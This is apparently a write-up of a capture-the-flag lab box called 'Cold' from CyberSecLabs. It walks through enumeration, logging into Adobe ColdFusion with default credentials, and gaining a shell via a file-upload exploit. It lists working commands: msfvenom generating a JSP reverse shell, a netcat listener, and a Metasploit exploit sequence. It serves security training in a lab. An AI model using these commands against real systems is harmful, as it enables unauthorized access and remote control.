In this Walkthrough, we used one of the lab machines in cyberseclabs that goes by COLD. We demonstrated both manual application of exploits on Adobe ColdFusion and automatic with Metasploit.
Cold from CyberSecLabs is a beginner level Windows box with a remote service exploit, that shows the importance of initial enumeration and directory discovery. After gaining initial access we’ll again abuse a service to elevate our privilege.
Highlights
We start with information gathering and nmap scanning. Here we’ve used a simple nmap with the -sV switch to enable Service Enumeration.
Then for web scanning and enumeration we used Nikto Web Vulnerability Scanner. Nikto is a free open source web server scanner, which scans a target website against 6000+ tests. Including scans for vulnerabilities, mis-configurations, out-dated versions, and much more.
After gaining access to the Adobe ColdFusion web interface, we used Searchsploit to quickly see what exploits are available for ColdFusion.
Then with the help of Metasploit, we use the module exploit(multi/http/coldfusion_chkeditor_file_upload) and set the required parameters.
After gaining initial foothold to the Windows machine, we start the Windows privilege escalation process using PEASS – Privilege Escalation Awesome Scripts SUITE. You can get it here
Initial Reconnaissance and Port Scanning
I started by examining the results of an Nmap scan. This helped me identify the open ports and services running on the target machine. The key findings were:
- HTTP on port 80
- SMB on ports 139 and 135 (indicating a Microsoft Windows Server 2008)
- Remote Desktop on port 3389
- Other web servers on ports 5500 (Jetty) and 8500
Web Server Enumeration and ColdFusion Discovery
Next, I moved on to enumerating the web servers. The main web server on port 80 was a default XAMPP server page with no obvious vulnerabilities. The web server on port 5500 (Jetty) seemed to be non-functional, and my attempts to find exploits for it using Metasploit were unsuccessful.
My focus then shifted to port 8500. Although it initially showed an error, I used GoBuster with a “coldfusion” wordlist to discover directories like /CFIDE
and /CFIDE/administrator
. By viewing the page source and navigating to phpinfo.jsp
on port 8500, I confirmed the presence of a ColdFusion instance running on the machine.
Exploiting Adobe ColdFusion
I was able to log into the Adobe ColdFusion administrator panel using the default credentials (admin/admin). A quick search for ColdFusion exploits using searchsploit
revealed a promising vulnerability: “Adobe ColdFusion 2018 Arbitrary File Upload.”
This exploit required me to manipulate a POST request to upload a shell. I generated a Java JSP reverse shell payload using msfvenom
. My initial attempts at manual exploitation using Burp Suite were unsuccessful; the shell was uploaded but not executed.
Due to the failure of manual exploitation, I switched to Metasploit and used the exploit/multi/http/coldfusion_file_upload
module. This exploit successfully uploaded and executed the JSP shell, giving me a command shell on the target machine. 🥳
Technical Commands
Here are some of the technical commands I used in the video:
- GoBuster:
gobuster directory -u <IP_ADDRESS>:<PORT> -w <WORDLIST>
- MSFVenom:
sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4545 -f raw -o sh.jsp
- Netcat:
sudo nc -lvnp 4545
- Metasploit:
search type exploit name coldfusion
use exploit/multi/http/coldfusion_file_upload
show options
set lhost <YOUR_IP>
set lport 4545
set rhosts <TARGET_IP>
set rport 8500
exploit
- Post-Exploitation:
whoami
Next Steps
The video concludes with me stating that the next step will be to escalate privileges on the Windows box by enumerating services and finding a vulnerable service. This will be covered in the next part of the series. Stay tuned! 📺
Video Walkthrough